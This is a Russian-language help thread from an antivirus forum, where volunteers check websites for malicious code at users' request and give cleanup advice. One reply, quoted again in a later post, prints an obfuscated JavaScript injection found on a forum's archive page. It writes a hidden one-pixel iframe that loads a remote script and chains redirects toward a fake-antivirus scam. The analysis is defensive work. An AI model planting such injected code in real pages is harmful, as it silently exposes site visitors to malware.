Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,595
Реакции
13,564
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Здравствуйте, Уважаемые!
Не могли бы вы проверить хттп://prizolov.ru/
У меня аваст на некоторые страницы ругается...
 
Surok, пока ничего подозрительного не вижу. Можно скриншет с алертом и ссылку по которой происходит срабатывание антивируса.
 
Здравствуйте!
Проверьте плиз и мой сайт на вирус там скорей всего либо фрейм, скрипт или JS.
Вот сайт design-studio.at.ua

Заранее спс
 
vicik_SH, необходимо больше информации. Сейчас я не вижу вредоносного кода.

Полезные сылки по вашему ресурсу.
1
2

Вечером попробую провести более глубокий анализ с тестовой машины.
 
А если я пришлю Вам по АСЕ или по мылу HTML шаблон чтоб Вы проверили его или нет в нём вредоносного скрипта или JS файла, ато хочу поменять Дизайн а тут такое.
P.S - Когда ставлю тот шаблон то слева шрифт нормальный а с правой стороны во всех блоках он чуток "жирный"
 
vicik_SH, хорошо.

akok<at>pisem.net с указанной ссылкой на тему. (at=@)

Добавлено через 2 часа 16 минут 47 секунд
vicik_SH, ответ отправил мылом.
 
Здравствуйте! проверьте пожалуйста на наличие вирусов ввв.fxstart-forum.org . Кажись там снова завелась зараза, которая редиректит на хттп://armadaneo.info/0/go.php?sid=2#post40889.
 
Последнее редактирование модератором:
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
 
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }


Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).

Спасибо!!!
 
araan515, это специально веб мастер столько порно набросал?

Добавлено через 1 минуту 38 секунд
Прошу простить, но у меня нет желания разбирать сайт с подобным рекламным контентом.

Спасибо за понимание.
 
Добрый день! Помогите вылечить сайт ввв.mebellina.com
Аваст ругается на JS Downloader EX, на HTML:Illframe...
Что делать??? ЗАРАНЕЕ СПАСИБО
 
posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
Пришлось пока сменить главную страницу на сообщение о работах на сайте... Антивирус Аваст стоит. Вообще как лечатся сайты от вирусов? Какой-нибудь софт есть? Скрипты?
 
Подходы стандартны.

Проверки html страницы на наличия "вкраплений"

Проверка файлов на FTP и сравнение с исходниками.

Ну а в начале обязательно сменить пароль на FTP (и больше не хранить его в файл менеджерах)

Добавлено через 48 секунд
Антивирус Аваст стоит.
Иногда ругается на рекламу.
 
Проверьте плиз сайт нттп smartall.ru KIS 9.0 ругается на Exploit.Win32.Pidief.cvy. Если реально есть то объясните как решить проблему ! буду благодарен !
 
Назад
Сверху Снизу